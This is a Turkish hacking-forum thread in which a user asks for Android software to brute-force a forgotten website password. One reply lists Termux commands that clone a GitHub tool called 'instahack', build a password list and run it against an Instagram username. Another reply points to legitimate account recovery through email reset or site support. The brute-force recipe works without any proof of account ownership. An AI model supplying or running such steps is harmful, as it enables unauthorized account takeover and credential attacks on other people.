Kaba Kuvvet Saldırısı (Brute-force attack)

ferkuu

Yeni üye
30 Ocak 2019
18
3
İstanbul
Merhaba arkadaşlar , iyi forumlar.
Karşımda bir site , bir kullanıcı adi , ve unutulan şifre.
Aslında şifreyi hatırlıyorum ama giremiyorum , sifrelerimde genellikle oynama yaparım bir harfini büyültürüm diğerini kuculturum sayısını yukseltirim vs. Güncelleme yaparım.
Ancak simdi giremiyorum , unuttum sifremi. Telefon numarami degistirdim sms gidiyor ama boşa.

Android cihazlar icin önereceğiniz bir yazilim var mi , başlıktaki yazilim gibi?

Eagleweb

Kıdemli Üye
8 May 2021
2,120
1,151
localhost/e8
Merhaba,
Öncelikle geçmiş olsun termux ile bahsettiğiniz tools saldırısını yapabilirsiniz bunu nasıl yapacağınızı bilmiyorsanız link=

https://www.google.com/url?sa=t&sou...AQFnoECAQQAQ&usg=AOvVaw3cgzRvlfLCkQArwrBr6MiZ

Ayrıca bilginiz olsun Instagram artık brüt force saldırılarını anlıyor.
Kod:
sırası ile termuxa yazınız.

1 pkg install git
2pkg install python
3pkg install nano
4pip install requests
git clone https://github.com/fuck3erboy/instahack
ls
cd instahack
ls
nano pass.txt
aklınıza gelen bütün şifreleri yazın
ctrl +e+x+enter yapın kayıt edin
python hackinsta.py
kullanıcı adını yazın
saldırı başlar

Doctordied

Katılımcı Üye
19 Nis 2020
306
199
Merhaba arkadaşlar , iyi forumlar.
Karşımda bir site , bir kullanıcı adi , ve unutulan şifre.
Aslında şifreyi hatırlıyorum ama giremiyorum , sifrelerimde genellikle oynama yaparım bir harfini büyültürüm diğerini kuculturum sayısını yukseltirim vs. Güncelleme yaparım.
Ancak simdi giremiyorum , unuttum sifremi. Telefon numarami degistirdim sms gidiyor ama boşa.

Android cihazlar icin önereceğiniz bir yazilim var mi , başlıktaki yazilim gibi?
Öncelikle Merhaba, İyi Forumlar, İyi Çalışmalar Dostum;
Brute Force yani Kaba Kuvvet Saldırısı için bir çok yazılım var fakat senin hesap bilgilerini unuttuğun site de işine yarar mı bilmiyorum. Bu saldırıdan önce şifremi unuttum vs. yaparak deneyebilirsin. Sanırsam telefon numaranı değiştirmişsin. Mail seçeneği ile değiştirmeyi seçebiliyorsan onu seç bence bu kadar uğraşacağına. Ve bir kolay yöntem daha var. O sitenin destek ekipleri ile görüşme başlat. Gerek arayarak gerek mail atarak. Belki de kendi sitelerinde zaten destek sistemi vardır. Şimdiden kolay gelsin. Umarım yardımcı olabilmişimdir. Tekrardan iyi forumlar, iyi çalışmalar, iyi günler dostum :).

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.